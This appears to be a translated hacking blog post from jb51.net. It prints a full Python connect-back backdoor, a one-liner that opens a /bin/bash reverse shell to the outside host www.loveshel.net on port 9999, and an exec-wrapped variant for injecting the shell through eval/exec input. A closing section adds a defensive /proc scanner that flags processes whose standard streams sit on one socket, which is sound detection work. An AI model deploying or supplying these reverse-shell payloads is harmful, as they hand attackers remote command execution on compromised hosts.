I don't know why I suddenly want to see this.
Python connect-back (reverse) shell code
#!/usr/bin/python
# Python connect-back backdoor
# Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
# Version: 1.0
# Date: July 15th 2006
import sys
import os
import socket
shell = "/bin/sh"
def usage(programname):
    print "Python connect-back backdoor"
    print "Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>"
    print "Date: July 15th 2006\n"
    print "Usage: %s <conn_back_host> <port>\n" % programname
def main():
    if len(sys.argv) != 3:
        usage(sys.argv[0])
        sys.exit(1)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # connect() takes a single (host, port) tuple
        s.connect((socket.gethostbyname(sys.argv[1]), int(sys.argv[2])))
        print "[+] Connect OK."
    except Exception:
        print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2])
        sys.exit(2)
    s.send("-------------------- Python connect-back backdoor ------------------\n")
    s.send("----------------------------- by wofeiwo -------------------------------\n")
    # Point stdin, stdout and stderr at the socket before starting the shell
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    global shell
    os.system(shell)
    print "See u!"
    s.close()
if __name__ == "__main__": main()
That is not convenient when exploiting a vulnerability, is it? If we want it short, trim it down to the following:
import sys; import os; import socket; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((socket.gethostbyname("www.loveshel.net"), 9999)); s.send("Welcome my master\r\n"); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); s.send("Is there a shell?\r\n"); os.system("/bin/bash"); s.close(); s.send("see u next time!\r\n");
How? It's very short, right?
However, it is very likely that the place where the vulnerability is exploited does not allow multiple statements. For example, if the input ends up in eval, multiple statements cannot be used (this is explained later).
exec 'import sys; import os; import socket; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((socket.gethostbyname("www.loveshel.net"), 9999)); s.send("Welcome my master\\r\\n"); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); s.send("Is there a shell?\\r\\n"); os.system("/bin/bash"); s.close(); s.send("see u next time!\\r\\n");';
Note the \\r\\n. Even inside '', a \r\n would become a line break, so even where it is not needed here, code can be constructed this way. In addition, why not use eval?
I reviewed the manual:
The exec statement is used to execute Python statements stored in a string or a file. For example, we can generate a string containing Python code at runtime and then execute these statements using the exec statement.
The eval statement is used to evaluate a valid Python expression stored in a string.
It seems that an error occurs when eval is used.
YY, the idea is the same, but the specific language is different. How can we jump out of the language restrictions? It's a problem ......
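From the defender's side, the three os.dup2 calls in the script above leave the spawned shell with file descriptors 0, 1 and 2 all pointing at one socket, which on Linux is visible under /proc/<pid>/fd. The check below is an added example, not part of the original article; it is written for Python 3, and the function names and the sample fd tables are constructed for illustration.

```python
import os
import re

SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")  # readlink() form of a socket fd

def stdio_socket_inode(fd_links):
    """Return the inode if fds 0, 1 and 2 all point at one socket, else None.

    fd_links maps fd number -> readlink() target of /proc/<pid>/fd/<n>.
    """
    inodes = set()
    for fd in (0, 1, 2):
        match = SOCKET_LINK.match(fd_links.get(fd, ""))
        if match is None:
            return None          # a tty, pipe, file or closed fd: not the pattern
        inodes.add(match.group(1))
    return inodes.pop() if len(inodes) == 1 else None

def read_fd_links(pid, proc_root="/proc"):
    """Read the stdio link targets of one process, skipping unreadable fds."""
    links = {}
    for fd in (0, 1, 2):
        try:
            links[fd] = os.readlink(os.path.join(proc_root, str(pid), "fd", str(fd)))
        except OSError:          # process exited, or not permitted to look
            pass
    return links

def scan(proc_root="/proc"):
    """Return sorted (pid, inode) pairs for processes showing the pattern."""
    hits = []
    for entry in os.listdir(proc_root):
        if entry.isdigit():
            inode = stdio_socket_inode(read_fd_links(entry, proc_root))
            if inode is not None:
                hits.append((int(entry), inode))
    return sorted(hits)

# Constructed fd tables (not captured from a real host).
SAMPLES = {
    4242: {0: "socket:[91827]", 1: "socket:[91827]", 2: "socket:[91827]"},
    1001: {0: "/dev/pts/3", 1: "/dev/pts/3", 2: "/dev/pts/3"},
    2002: {0: "/dev/null", 1: "socket:[555]", 2: "socket:[555]"},
    3003: {0: "socket:[70]", 1: "socket:[71]", 2: "socket:[72]"},
}

def flag_samples(samples=SAMPLES):
    return [pid for pid in sorted(samples) if stdio_socket_inode(samples[pid])]

if __name__ == "__main__":
    print("constructed samples flagged:", flag_samples())
    print("live hits:", scan())
```

A hit is a lead for triage, not a verdict: inetd-style and socket-activated services legitimately run with stdio on a socket, so check the process name, its parent and the socket's remote peer before acting.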
This article is from Script Home (www.jb51.net). Detailed source: http://www.jb51.net/html/200708/97/11135.htm